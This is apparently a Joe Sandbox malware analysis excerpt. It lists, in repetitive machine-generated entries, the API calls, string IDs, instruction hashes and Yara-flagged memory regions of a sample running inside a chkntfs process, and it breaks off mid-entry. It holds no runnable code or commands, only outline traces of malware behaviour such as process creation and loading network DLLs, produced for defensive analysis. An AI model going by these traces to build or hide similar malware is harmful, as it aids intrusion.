                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 1ca4946646b4c12e0b844d6146134c0bf46a169a3d6d884918fcd22721a2d949
                                                                      • Instruction ID: 5428efe465f708d4a67c44ab25c6bdd9bd3e20a933d972d2dc56b40ad08cbb1b
                                                                      • Opcode Fuzzy Hash: 1ca4946646b4c12e0b844d6146134c0bf46a169a3d6d884918fcd22721a2d949
                                                                      • Instruction Fuzzy Hash: E490022530141003F540715854286164015DBF1305F55D012E0515564CDA19D9565222
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: cbc26e7a54dc1ade94de86ab68e02faa7c979b4182f29619090e573069e7946d
                                                                      • Instruction ID: 5e2178da90b10dd9430ddeadedda37cd35a6ffb8dcd991d6d9a265640d74487c
                                                                      • Opcode Fuzzy Hash: cbc26e7a54dc1ade94de86ab68e02faa7c979b4182f29619090e573069e7946d
                                                                      • Instruction Fuzzy Hash: 9A900225242451527945B158441451740169BF0245795C013A1515960C862AE956D621
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: aec570483e85f62d9399443ab7191868de49a3f334a93ac01ec85df98dc1b384
                                                                      • Instruction ID: 33739269febb21b814de9bfeb5fc56dc7233c56e5827b90c120a811da02b01e6
                                                                      • Opcode Fuzzy Hash: aec570483e85f62d9399443ab7191868de49a3f334a93ac01ec85df98dc1b384
                                                                      • Instruction Fuzzy Hash: 2D90023520141413F5117158451471700198BE0245F95C413A0525568D975ADA52A121
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 3473e7ee0495efe5050ba1e071eaae06021f798086e829ab6cf2d6503eafa5d8
                                                                      • Instruction ID: a83747c7761ba1827d6b4f98843bc8193a4f4904bd24e9ebb7692f6b92dad586
                                                                      • Opcode Fuzzy Hash: 3473e7ee0495efe5050ba1e071eaae06021f798086e829ab6cf2d6503eafa5d8
                                                                      • Instruction Fuzzy Hash: A590026520181403F5407558481461700158BE0306F55C012A2165565E8B2DDD516135
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: e7f6bc1894f2bf7b27708b63a0798aae97f498249371ec8564e3e061faa765cd
                                                                      • Instruction ID: 3f73e21d2be72dfcdd0d96e8a4eb31cafdbae66a15fa4c1cbd8256347363446e
                                                                      • Opcode Fuzzy Hash: e7f6bc1894f2bf7b27708b63a0798aae97f498249371ec8564e3e061faa765cd
                                                                      • Instruction Fuzzy Hash: 6890022560141502F50171584414626001A8BE0245F95C023A1125565ECB29DA92A131
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 4c25192b2a7888a61512e5a9d29cca497731dcfc58fb0fd7b6b4e3fb3f4e84fb
                                                                      • Instruction ID: 6b7b4436162696778639af82b6bf823da8221858357eb1412a88260e93837878
                                                                      • Opcode Fuzzy Hash: 4c25192b2a7888a61512e5a9d29cca497731dcfc58fb0fd7b6b4e3fb3f4e84fb
                                                                      • Instruction Fuzzy Hash: 5690026534141442F50071584424B160015CBF1305F55C016E1165564D871DDD526126
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: d2f901cfa20464f8199742eb3791e8766e5832913db8c559ff7740a8b4bac873
                                                                      • Instruction ID: 51bdd0f2b4d95936cacd73c3443a96e78ab500842517b39ec0c1218310fdaafc
                                                                      • Opcode Fuzzy Hash: d2f901cfa20464f8199742eb3791e8766e5832913db8c559ff7740a8b4bac873
                                                                      • Instruction Fuzzy Hash: 25900225211C1042F60075684C24B1700158BE0307F55C116A0255564CCA19D9615521
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: e16e3c5a1149f086812aba1a9e9a59ce83d50a545f3e6087f5a50a3f33749f88
                                                                      • Instruction ID: e94523fac0573d81eea9bede9ef8223bdfb18e0f0da2072082e34f66ac89ed3b
                                                                      • Opcode Fuzzy Hash: e16e3c5a1149f086812aba1a9e9a59ce83d50a545f3e6087f5a50a3f33749f88
                                                                      • Instruction Fuzzy Hash: 31900225601410426540716888549164015AFF1215755C122A0A99560D865DD9655665
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 493eeff37cc7b0a38a4971eedcbb386ed661fb1e43aff9101563b3d31f831572
                                                                      • Instruction ID: 0ac5a7bae663d2e66e38a9deb03d34b9fc68f011f44191a3988b363d0f7ce27d
                                                                      • Opcode Fuzzy Hash: 493eeff37cc7b0a38a4971eedcbb386ed661fb1e43aff9101563b3d31f831572
                                                                      • Instruction Fuzzy Hash: FA900229211410032505B558071451700568BE5355355C022F1116560CD725D9615121
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 9e9e2c7c22ef3fcef1d356ddb8c40debaaac1fa9b0de71172765ae5bd9fd9889
                                                                      • Instruction ID: 77f1bdb47d4df4de235f23c0070039f46eff5744f39b7434692c091b5c229c98
                                                                      • Opcode Fuzzy Hash: 9e9e2c7c22ef3fcef1d356ddb8c40debaaac1fa9b0de71172765ae5bd9fd9889
                                                                      • Instruction Fuzzy Hash: 1F900229221410022545B558061451B04559BE6355395C016F15175A0CC725D9655321
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f3e4b034ddb2d6f2a5c7337eb2e24ae6f319a58cb2e27418dcc62eda78d7d8e5
                                                                      • Instruction ID: 861c0e9af9c6d70f7748ea469bc2c6c330ff283c5807a06142ad9f7bcd800262
                                                                      • Opcode Fuzzy Hash: f3e4b034ddb2d6f2a5c7337eb2e24ae6f319a58cb2e27418dcc62eda78d7d8e5
                                                                      • Instruction Fuzzy Hash: 0090026520241003650571584424626401A8BF0205B55C022E11155A0DC629D9916125
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 58b18adaf626e27bbc0ea1df0b2936cdea5af946a51ca0e01aad9be9c4ecdb32
                                                                      • Instruction ID: d2de659317e75fdcd50d30926df48c02461a13b2d6a86b4cc4f9355ae0264ce3
                                                                      • Opcode Fuzzy Hash: 58b18adaf626e27bbc0ea1df0b2936cdea5af946a51ca0e01aad9be9c4ecdb32
                                                                      • Instruction Fuzzy Hash: C490023520545842F54071584414A5600258BE0309F55C012A01656A4D9729DE55B661
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 488ab902d3e6cfc913397a5dd3c09c79ec00cc8d0ea85681a3e82fdf87985897
                                                                      • Instruction ID: 3303e2970a30929784403d9e656b5f69ed5db50e84e1ccfc02a7aa3b510dd6eb
                                                                      • Opcode Fuzzy Hash: 488ab902d3e6cfc913397a5dd3c09c79ec00cc8d0ea85681a3e82fdf87985897
                                                                      • Instruction Fuzzy Hash: 1690023520141802F5807158441465A00158BE1305F95C016A0126664DCB19DB5977A1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: be415b402bfe4b273ec75675bd2450fe0eed44d65e38fc61873aa7ea7bc929fc
                                                                      • Instruction ID: fc3b1f2e297d36ba244a0efc8c151f0c9de9d846799ad0a4c03323ebfe8eab3d
                                                                      • Opcode Fuzzy Hash: be415b402bfe4b273ec75675bd2450fe0eed44d65e38fc61873aa7ea7bc929fc
                                                                      • Instruction Fuzzy Hash: CD90023560541802F5507158442475600158BE0305F55C012A0125664D8759DB5576A1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: dfbd76090cc83036327941be2578da9c2ca77f2e28379ff95daa6ca2c3c8e0f3
                                                                      • Instruction ID: fc210d6a4cb48c8c83a56e83c1d3eeb5e85df176cec1e80f9d811345167f152a
                                                                      • Opcode Fuzzy Hash: dfbd76090cc83036327941be2578da9c2ca77f2e28379ff95daa6ca2c3c8e0f3
                                                                      • Instruction Fuzzy Hash: 5E90023560551402F5007158452471610158BE0205F65C412A0525578D8799DA5165A2
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4624105583.0000000004450000.00000040.00001000.00020000.00000000.sdmp, Offset: 04450000, based on PE: true
                                                                      • Associated: 00000006.00000002.4624105583.0000000004579000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.000000000457D000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000006.00000002.4624105583.00000000045EE000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_4450000_chkntfs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 358e81498320c5953b966aed3ca452914b55d1bd6ac3d5ed50079f5bf52d3cda
                                                                      • Instruction ID: ab6ca22db74ffa3640e7992a3cb265f0cad0f463256131fb236d257812107d72
                                                                      • Opcode Fuzzy Hash: 358e81498320c5953b966aed3ca452914b55d1bd6ac3d5ed50079f5bf52d3cda
                                                                      • Instruction Fuzzy Hash: CA90022524546102F550715C44146264015ABF0205F55C022A09155A4D8659D9556221
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 024A453B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      • Opcode ID: 8526a9164fea61521c6fa0bc7457002faf8335ab52a44f19ec57b3d3beb463da
                                                                      • Instruction ID: 1868192c81b11dd4e7a33f37c9218a69e802026ccfd67e8745f5ceb199215d59
                                                                      • Opcode Fuzzy Hash: 8526a9164fea61521c6fa0bc7457002faf8335ab52a44f19ec57b3d3beb463da
                                                                      • Instruction Fuzzy Hash: 6D31A0B1A00205BFD714DFA4CC80FEBBBB9FB88714F04452EEA595B240D770AA40CBA5
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InitializeUninitialize
                                                                      • String ID: @J7<
                                                                      • API String ID: 3442037557-2016760708
                                                                      • Opcode ID: c2847feeaf1e8c90b86a4e789c4fde1a729c45061be6a2408e2d61f0c97adb61
                                                                      • Instruction ID: 386fea88e4222af655a19ee6432782a55a8501dd5a580ecec2a91b9a9dfb93ed
                                                                      • Opcode Fuzzy Hash: c2847feeaf1e8c90b86a4e789c4fde1a729c45061be6a2408e2d61f0c97adb61
                                                                      • Instruction Fuzzy Hash: 8F314376A0020A9FDB00DFD9D8809EFB7B9FF49304B10855AE516EB204D771EE058BA0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InitializeUninitialize
                                                                      • String ID: @J7<
                                                                      • API String ID: 3442037557-2016760708
                                                                      • Opcode ID: 061bb97c7d17255cf171348275c9a901479dc002fbdcf7a5373d247828c9ced6
                                                                      • Instruction ID: 8e0eb561f1cb4216ff2c48a8ada0169397b261f818905b0f0d15c02e8cc13b9f
                                                                      • Opcode Fuzzy Hash: 061bb97c7d17255cf171348275c9a901479dc002fbdcf7a5373d247828c9ced6
                                                                      • Instruction Fuzzy Hash: FB314376A0020A9FDB00DFD9C8809EFB7B9FF49304B10855AE506E7204D771EE058BA0
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02494F72
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID: j
                                                                      • API String ID: 2234796835-2137352139
                                                                      • Opcode ID: be920c9f479a91a4f88bcdf85411efb129fc45386ea76b9edb693cabae7da69a
                                                                      • Instruction ID: dfab085dedc03604d5864d6254e4e7d966678f1c52a938b18acd00f0d8b08316
                                                                      • Opcode Fuzzy Hash: be920c9f479a91a4f88bcdf85411efb129fc45386ea76b9edb693cabae7da69a
                                                                      • Instruction Fuzzy Hash: 55E0AB3B94044ADFCF01DD38D141A197720EB8173032503C9E81E8B388C773D81E8B46
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02494F72
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: ff79105ba4eda4c34d62e1d2641d720007ffb5dd8a5b2f09d5c217583579c30e
                                                                      • Instruction ID: 36c68d372d8f07dd6bdecadf4bcf0d4a438b65fd4a4a22026849cb2cc5ce657f
                                                                      • Opcode Fuzzy Hash: ff79105ba4eda4c34d62e1d2641d720007ffb5dd8a5b2f09d5c217583579c30e
                                                                      • Instruction Fuzzy Hash: 390121B5E0020EABDF10DBE5DC51FEEB7B99B54308F0041AAE90997640F671E715CB91
                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,?,?,?,02498CBE,00000010,?,?,?,00000044,?,00000010,02498CBE,?,?,?), ref: 024AA2E0
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      • Opcode ID: e080d54c05e7f5f7ac34d5b689cd143de01e92abce72a28ff273299c14727eec
                                                                      • Instruction ID: 9effcbae4f7163ca0919204f3c34d89bfc129d1a6f68a7c2421f8ed38a59feee
                                                                      • Opcode Fuzzy Hash: e080d54c05e7f5f7ac34d5b689cd143de01e92abce72a28ff273299c14727eec
                                                                      • Instruction Fuzzy Hash: CD01C0B2214508BFCB44DE89DC81EDB77ADAF8C714F418109BA19E3240D630F8518BA4
                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02489F95
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: 39f28bd57ac128d3e3fe73779f3a4c14b830114a0a30c60ba62e389f18e413e5
                                                                      • Instruction ID: be81d710362c0753be19ca2e74b147e1b9c21dfeff324862e6572d5180320408
                                                                      • Opcode Fuzzy Hash: 39f28bd57ac128d3e3fe73779f3a4c14b830114a0a30c60ba62e389f18e413e5
                                                                      • Instruction Fuzzy Hash: 55F0657379031436E23075EAAC02FDBB29D9B90B61F14042BF70DDB2C0D991B44146E5
                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02489F95
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: dd5ee357178cc50599d99f635e94580111b3b68c9eee8eea461efdf19d769029
                                                                      • Instruction ID: 611dc128b0791caf5c4a63f2db2ba60836efe1e337b616ae6113af02ebf1f547
                                                                      • Opcode Fuzzy Hash: dd5ee357178cc50599d99f635e94580111b3b68c9eee8eea461efdf19d769029
                                                                      • Instruction Fuzzy Hash: 54F09B7278031076E23075A99C02FEB635D9FD0B50F24041AF60DEF2C0D9A278414BA4
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,04C483C8,00000007,00000000,00000004,00000000,02494774,000000F4), ref: 024AA22F
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: 022a33274c00017e27d0856b3283fc4b76884d826ee56593da5a3b38b4d84440
                                                                      • Instruction ID: 980a681f4ad89fc7c00e4f93c5a3f874c0997d4095b03ef502223b05a70b7109
                                                                      • Opcode Fuzzy Hash: 022a33274c00017e27d0856b3283fc4b76884d826ee56593da5a3b38b4d84440
                                                                      • Instruction Fuzzy Hash: 76E065722042087BDA14EE99DC41FAB33ADEFC9750F40440AF909A7241D731B9118BB5
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(024923B9,?,024A628F,024923B9,024A603F,024A628F,?,024923B9,024A603F,00001000,?,?,00000000), ref: 024AA1DF
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: a52a85756bf179ed280f2f603ea5bec3513c43c458f35bb9d0ed9cbe90f592d4
                                                                      • Instruction ID: b0e211eef087fab48c8b0f0e591f23a6116b0939bfc8146e0258254e877cf001
                                                                      • Opcode Fuzzy Hash: a52a85756bf179ed280f2f603ea5bec3513c43c458f35bb9d0ed9cbe90f592d4
                                                                      • Instruction Fuzzy Hash: 5BE065B22002087FD710EE99DC41FAB37AEEFC9720F40840AF908A7241D671B9108BB4
                                                                      APIs
                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 02498D2C
                                                                      Memory Dump Source
                                                                      • Source File: 00000006.00000002.4615499676.0000000002480000.00000040.80000000.00040000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_6_2_2480000_chkntfs.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AttributesFile
                                                                      • String ID:
                                                                      • API String ID: 3188754299-0
                                                                      • Opcode ID: 7fda123ae788be64ab2a9a01aa2374057dd2d38cafb237f5b7f9c9b16f9a9a40
